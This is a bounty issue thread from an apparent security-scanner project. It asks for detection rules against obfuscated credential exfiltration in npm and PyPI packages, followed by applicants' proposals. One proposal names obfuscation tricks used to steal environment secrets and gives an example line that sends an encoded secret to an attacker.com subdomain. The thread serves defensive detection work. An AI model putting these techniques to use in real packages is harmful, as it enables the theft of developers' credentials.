Detect obfuscated credential exfiltration patterns

[0xRapi]

Bounty: Detect obfuscated credential exfiltration patterns

Reward: 1,000 $ISNAD
Track: Detection
Difficulty: Hard

Description

Create detection patterns for obfuscated credential exfiltration in npm/PyPI packages. Malicious packages increasingly use encoding tricks (base64, hex, char codes, string reversal) to hide credential theft from static analysis.

Requirements

• Detect base64-encoded exfiltration URLs
• Detect hex/charcode-constructed API endpoints
• Detect string reversal and concatenation obfuscation
• Detect environment variable harvesting with obfuscated transmission
• Minimum 10 test cases with real-world malware samples
• False positive rate < 0.1% on top 1000 npm packages
• Tests passing

How to Submit

Open a PR referencing this issue. See Bounty Program for full rules.

[yuliuyi717-ux]

I can take this bounty. Plan: add a dedicated obfuscation test corpus (>=10 cases) covering base64 URL exfil, hex/charcode endpoint construction, string reversal/concatenation, and env-harvest + encoded transmission; then implement new scanner patterns and context correlation while preserving low false positives for normal package code.

[yuliuyi717-ux]

Implemented and submitted: #19

Includes 10 test cases covering base64/hex/charcode/reverse/concat obfuscation and env-harvest + obfuscated transmission correlation.

[gabrivardqc123]

Submission for bounty #1. PR: #25

[Iceshen87]

Hi CounterSpec team! 👋

I am interested in this bounty!

My Plan:

1. Research common credential exfiltration patterns
2. Implement detection for obfuscated patterns
3. Add regex/signature-based detection
4. Create test cases for various obfuscation techniques
5. Document detection capabilities

Timeline: 3-4 days
Reward: 1,000 $ISNAD works for me!

Why I am a good fit:

• Experience with security pattern detection
• Familiar with credential theft techniques
• Strong Python/JavaScript analysis skills

Ready to start immediately!

• Ethan (Iceshen87)

[Iceshen87]

Hi CounterSpec team! 👋

I am interested in the credential exfiltration detection bounty!

My Plan:

1. Research common credential exfiltration patterns
2. Implement detection for obfuscated patterns
3. Add regex/signature-based detection
4. Create test cases for various obfuscation techniques
5. Document detection capabilities

Timeline: 3-4 days
Reward: 1,000 $ISNAD works for me!

Why I am a good fit:

• Experience with security pattern detection
• Familiar with credential theft techniques
• Strong Python/JavaScript analysis skills

Ready to start immediately!

• Ethan (Iceshen87)

[chengyixu]

Proposal: Detect Obfuscated Credential Exfiltration Patterns

Approach:

I'd like to implement detection rules for obfuscated credential exfiltration, covering the most common real-world obfuscation techniques used by supply chain attackers.

Detection patterns:

1. String splitting/concatenation - Detect credentials accessed via split strings (e.g., process['en' + 'v'], global['pro' + 'cess']) that are then sent over the network
2. Base64/hex encoding - Flag btoa(), Buffer.from(...).toString('base64'), or hex encoding applied to environment variables or file contents before transmission
3. Character code construction - Detect String.fromCharCode() chains that reconstruct sensitive variable names at runtime
4. Indirect property access - Flag bracket notation access on process.env using computed keys (e.g., process.env[varName] where varName is derived from obfuscated strings)
5. DNS exfiltration - Detect credential data embedded in DNS lookups (dns.resolve(), fetch('https://' + encodedSecret + '.attacker.com'))
6. Steganographic hiding - Flag patterns where sensitive data is embedded in seemingly benign payloads (headers, cookies, query params with encoded values)

Implementation:

• AST-based pattern matching using the existing scanner architecture
• Multi-signal scoring: each pattern contributes to a composite threat score
• Configurable thresholds to balance sensitivity vs. false positives
• Comprehensive test suite with real-world malicious package examples

Timeline: Can deliver within 48-72 hours.